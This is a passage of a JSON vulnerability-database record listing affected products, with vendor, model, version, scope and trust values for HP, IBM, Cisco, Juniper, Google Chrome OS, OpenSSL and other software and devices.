        "version": "600"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.126"
      },
      {
        "model": "open source security information management",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "alienvault",
        "version": "2.1.5-2"
      },
      {
        "model": "laserjet m4345 multifunction printer cb427a",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "48.306.1"
      },
      {
        "model": "open systems snapvault",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.6.1"
      },
      {
        "model": "laserjet p4515 cb517a",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "sylpheed",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "sylpheed",
        "version": "1.9"
      },
      {
        "model": "big-ip gtm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.3"
      },
      {
        "model": "color laserjet cp5525 ce709a",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "laserjet m5025 multifunction printer q7840a",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.12"
      },
      {
        "model": "oceanstor s5800t v100r005",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.0.2"
      },
      {
        "model": "security network intrusion prevention system gx4002",
        "scope": null,
        "trust": 0.3,
        "vendor": "ibm",
        "version": null
      },
      {
        "model": "oceanstor s5800t v100r005c30spc100",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "color laserjet cp6015 q3933a",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "bladesystem c-class virtual connect",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "4.20"
      },
      {
        "model": "color laserjet flow m680 cz250a",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "junos 11.4r1",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "vdi communicator",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "1.0.2"
      },
      {
        "model": "color laserjet cp3505 printer series cb444a",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "3.160.2"
      },
      {
        "model": "xenclient enterprise",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "citrix",
        "version": "4.5.3"
      },
      {
        "model": "icewall sso dfw r3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "8.0"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.0.10"
      },
      {
        "model": "web security gateway",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "websense",
        "version": "7.7"
      },
      {
        "model": "color laserjet printer series cb432a",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "470046.230.6"
      },
      {
        "model": "cognos express",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "10.1"
      },
      {
        "model": "one-x client enablement services",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.1.1"
      },
      {
        "model": "horizon view client",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "5.3.1"
      },
      {
        "model": "big-ip webaccelerator",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "10.2.4"
      },
      {
        "model": "big-ip psm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "10.2.1"
      },
      {
        "model": "open source security information management",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "alienvault",
        "version": "4.7.0"
      },
      {
        "model": "big-ip asm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "10.0.00"
      },
      {
        "model": "color laserjet multifunction printer series q7519a",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "400046.380.3"
      },
      {
        "model": "telepresence tx series",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "90006.1.20"
      },
      {
        "model": "flashsystem 9848-ae1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "840"
      },
      {
        "model": "open source security information management",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "alienvault",
        "version": "2.1.2"
      },
      {
        "model": "malware analysis appliance",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "bluecoat",
        "version": "4.2.3"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.31"
      },
      {
        "model": "flex system",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v70007.2"
      },
      {
        "model": "sdk for node.js",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.1.0.2"
      },
      {
        "model": "integrated management module ii",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.00"
      },
      {
        "model": "proxysg sgos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bluecoat",
        "version": "6.5.6.2"
      },
      {
        "model": "junos os 12.1x47-d15",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.25"
      },
      {
        "model": "junos 13.1r2",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "vfabric application director",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "5.0"
      },
      {
        "model": "storevirtual 3tb mdl sas storage/s-buy",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "453011.5"
      },
      {
        "model": "tandberg mxp",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "9900"
      },
      {
        "model": "aura session manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.1"
      },
      {
        "model": "aura application enablement services",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.2.2"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.10"
      },
      {
        "model": "enterprise manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "2.3"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "4.1.2"
      },
      {
        "model": "cloud service automation",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "4.00"
      },
      {
        "model": "d9036 modular encoding platform",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "cluster network/management switches",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "netapp",
        "version": "0"
      },
      {
        "model": "vma san gateway g5.5.1",
        "scope": null,
        "trust": 0.3,
        "vendor": "hp",
        "version": null
      },
      {
        "model": "flex system p260 compute node /fc efd9",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "0"
      },
      {
        "model": "10.0-rc1-p1",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "blackberry os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "rim",
        "version": "10.0.92743"
      },
      {
        "model": "system storage ts2900 tape library",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "0025"
      },
      {
        "model": "family",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "8300"
      },
      {
        "model": "color laserjet cm6040 multifunction printer q3938a",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.0"
      },
      {
        "model": "storevirtual 450gb sas storage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "453011.5"
      },
      {
        "model": "chargeback manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "2.6"
      },
      {
        "model": "fortianalyzer",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "fortinet",
        "version": "5.2"
      },
      {
        "model": "color laserjet m651 cz258a 2302963 436073",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": null
      },
      {
        "model": "power",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "5950"
      },
      {
        "model": "tivoli netcool/system service monitor fp7",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.0.0"
      },
      {
        "model": "vdi-in-a-box",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "citrix",
        "version": "5.3.4"
      },
      {
        "model": "sterling b2b integrator",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "5.2"
      },
      {
        "model": "flex system p260",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "(7895-22x)0"
      },
      {
        "model": "cognos business intelligence server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "10.2"
      },
      {
        "model": "tssc",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.3.15"
      },
      {
        "model": "sylpheed",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "sylpheed",
        "version": "0.9.7"
      },
      {
        "model": "secblade fw family",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "winscp",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "winscp",
        "version": "5.5.3"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.42"
      },
      {
        "model": "icewall mcrp",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "2.1"
      },
      {
        "model": "snapdrive for windows",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.1"
      },
      {
        "model": "guardium database activity monitor",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.2"
      },
      {
        "model": "bbm for iphone",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "rim",
        "version": "2.2.1.24"
      },
      {
        "model": "vsphere sdk for perl",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "5.5"
      },
      {
        "model": "laserjet enterprise color mfp m880 a2w76a 2302963 436068",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "800"
      },
      {
        "model": "chrome for android",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "31.0.1650.59"
      },
      {
        "model": "systems director storage control",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.2.2.1"
      },
      {
        "model": "enterprise linux hpc node",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "6"
      },
      {
        "model": "project openssl 0.9.8s",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "aura communication manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.0.1"
      },
      {
        "model": "telepresence serial gateway series",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "uacos c4.4",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "linerate",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "1.6"
      },
      {
        "model": "big-ip asm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "10.2.1"
      },
      {
        "model": "elog v100r003c01",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "aura session manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.2"
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.2"
      },
      {
        "model": "proxysg sgos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bluecoat",
        "version": "6.2"
      },
      {
        "model": "systems director storage control",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.2.3.0"
      },
      {
        "model": "ata series analog telephone adaptor",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "1900"
      },
      {
        "model": "vios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.2.2.5"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.7"
      },
      {
        "model": "flare experience for ipad",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "1.2.1"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.125"
      },
      {
        "model": "communication server 1000e signaling server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "7.5"
      },
      {
        "model": "aura communication manager utility services",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.1.0.9.8"
      },
      {
        "model": "laserjet enterprise p3015 ce528a",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.186.1"
      },
      {
        "model": "junos space",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "juniper",
        "version": "1.3"
      },
      {
        "model": "unified ip phone",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "89610"
      },
      {
        "model": "idol speech software",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "10.7"
      },
      {
        "model": "enterprise linux server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "5"
      },
      {
        "model": "storevirtual fc 900gb sas storage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "433012.0"
      },
      {
        "model": "color laserjet enterprise cp4525 cc494a",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.3.7"
      },
      {
        "model": "vcenter operations manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "5.8.1"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "5.0"
      },
      {
        "model": "storevirtual hybrid storage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "433512.6"
      },
      {
        "model": "mac os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.7.5"
      },
      {
        "model": "aura application enablement services",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.0"
      },
      {
        "model": "sylpheed",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "sylpheed",
        "version": "1.9.5"
      },
      {
        "model": "integrated management module ii",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.30"
      },
      {
        "model": "storevirtual 450gb sas storage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "433011.5"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.51"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364160"
      },
      {
        "model": "fortianalyzer",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "fortinet",
        "version": "5.0.4"
      },
      {
        "model": "prime lan management solution",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "msr50 g2 russian version",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "iq",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5"
      },
      {
        "model": "flex system",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v70006.4"
      },
      {
        "model": "big-ip edge clients for linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "7080"
      },
      {
        "model": "dgs-1500-52",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "d link",
        "version": "2.51.005"
      },
      {
        "model": "junos 11.4r6-s2",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "laserjet m9040 multifunction printer cc394a",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "cms r17ac.h",
        "scope": null,
        "trust": 0.3,
        "vendor": "avaya",
        "version": null
      },
      {
        "model": "junos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "juniper",
        "version": "8.1"
      },
      {
        "model": "color laserjet cp3525 cc470a",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "storevirtual 1tb mdl china sas storage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "433012.0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.122"
      },
      {
        "model": "laserjet pro color printer m251n/nw cf146a",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "20020140919"
      },
      {
        "model": "rational reporting for development intelligence",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.0.1"
      },
      {
        "model": "laserjet printer series q5401a",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "42508.250.2"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.47"
      },
      {
        "model": "blackberry os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "rim",
        "version": "10.0.10"
      },
      {
        "model": "ucs central",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "power ps703 blade",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "(7891-73x)0"
      },
      {
        "model": "sylpheed",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "sylpheed",
        "version": "3.3.1"
      },
      {
        "model": "integrated management module ii",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.36"
      },
      {
        "model": "system storage ts3400 tape library",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "0039"
      },
      {
        "model": "dynamic system analysis",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.60"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.6"
      },
      {
        "model": "s7700\u0026s9700 v200r003",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "flex system p460 compute node",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "(7895-43x)0"
      },
      {
        "model": "update manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "5.1"
      },
      {
        "model": "vios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.2.1.3"
      },
      {
        "model": "big-ip webaccelerator",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "10.2.1"
      },
      {
        "model": "open source security information management",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "alienvault",
        "version": "1.0.6"
      },
      {
        "model": "sterling connect:direct for microsoft windows",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.7"
      },
      {
        "model": "openvpn",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "openvpn",
        "version": "2.3.4"
      },
      {
        "model": "junos 12.1x44-d32",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "splunk",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "splunk",
        "version": "6.1.2"
      },
      {
        "model": "freedome for android",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f secure",
        "version": "0"
      },
      {
        "model": "fortios b0630",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "fortinet",
        "version": "4.3.8"
      },
      {
        "model": "proventia network security controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.0.1768"
      },
      {
        "model": "nac guest server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "integrated management module ii",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.00"
      },
      {
        "model": "integrated management module ii",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.60"
      },
      {
        "model": "freebsd",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "freebsd",
        "version": "8.4"
      },
      {
        "model": "dsr-1000n 1.09.b61",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "unity connection",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "project metasploit framework",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "metasploit",
        "version": "4.1.0"
      },
      {
        "model": "oncommand unified manager host package",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "netapp",
        "version": "0"
      },
      {
        "model": "idp",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "juniper",
        "version": "5.1"
      },
      {
        "model": "oceanstor s2200t v100r005c30spc100",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "big-ip asm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.1"
      },
      {
        "model": "web security",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "websense",
        "version": "7.7"
      },
      {
        "model": "communication server 1000m",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "7.0"
      },
      {
        "model": "icewall sso dfw r1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "8.0"
      },
      {
        "model": "vdi-in-a-box",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "citrix",
        "version": "5.4.1"
      },
      {
        "model": "tivoli storage productivity center",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "5.2.10"
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.0.1"
      },
      {
        "model": "fortios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "fortinet",
        "version": "4.3.14"
      },
      {
        "model": "security enterprise scanner",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.3"
      },
      {
        "model": "spa232d multi-line dect ata",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "policy center v100r003c00spc305",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.1"
      },
      {
        "model": "smart analytics system",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "5600v19.7"
      },
      {
        "model": "bladesystem c-class onboard administrator",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "4.11"
      },
      {
        "model": "infosphere guardium",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.2"
      },
      {
        "model": "flex system p270 compute node",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "(7954-24x)0"
      },
      {
        "model": "switch series",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "58200"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.52"
      },
      {
        "model": "laserjet pro m401a/d/dn/dnw/dw/n cf285a",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "40020150212"
      },
      {
        "model": "crossbow",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "siemens",
        "version": "0"
      },
      {
        "model": "big-ip afm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.1"
      },
      {
        "model": "system x3650m2 type",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "79471.42"
      },
      {
        "model": "vdi-in-a-box",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "citrix",
        "version": "5.3.0"
      },
      {
        "model": "system x3200m3 type",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "73281.42"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.0.16"
      },
      {
        "model": "ios software",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "big-ip link controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.3"
      },
      {
        "model": "i v5r4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.1"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.39"
      },
      {
        "model": "ios xe software",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "vcenter server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "5.1"
      },
      {
        "model": "color laserjet cm6040 multifunction printer q3939a",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "tandberg codian isdn gw",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "32400"
      },
      {
        "model": "color laserjet cp6015 q3933a",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "4.203.1"
      },
      {
        "model": "project openssl b",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "openssl",
        "version": "0.9.8"
      },
      {
        "model": "integrated management module ii",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.76"
      },
      {
        "model": "aura session manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.2.1"
      },
      {
        "model": "10.0-release-p5",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "laserjet m3027 multifunction printer cc479a",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "junos space",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "juniper",
        "version": "11.1"
      },
      {
        "model": "laserjet multifunction printer series q3942a",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "43459.310.2"
      },
      {
        "model": "crossbow",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "siemens",
        "version": "4.2.3"
      },
      {
        "model": "junos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "juniper",
        "version": "9.2"
      },
      {
        "model": "junos 10.4s14",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "oncommand unified manager core package",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.25"
      },
      {
        "model": "storevirtual 600gb china sas storage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "413011.5"
      },
      {
        "model": "project openssl k",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "openssl",
        "version": "0.9.8"
      },
      {
        "model": "laserjet m4345 multifunction printer cb428a",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "48.306.1"
      },
      {
        "model": "storevirtual 2tb mdl sas storage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "453012.6"
      },
      {
        "model": "fortiweb",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "fortinet",
        "version": "5.1"
      },
      {
        "model": "anyconnect secure mobility client for android",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "uacos c4.4r11.1",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "dsr-500n 1.09.b61",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "color laserjet m651 cz255a",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "unified contact center enterprise",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "4.1.16"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.2.8"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.11"
      },
      {
        "model": "big-ip psm",
        "scope": "eq",
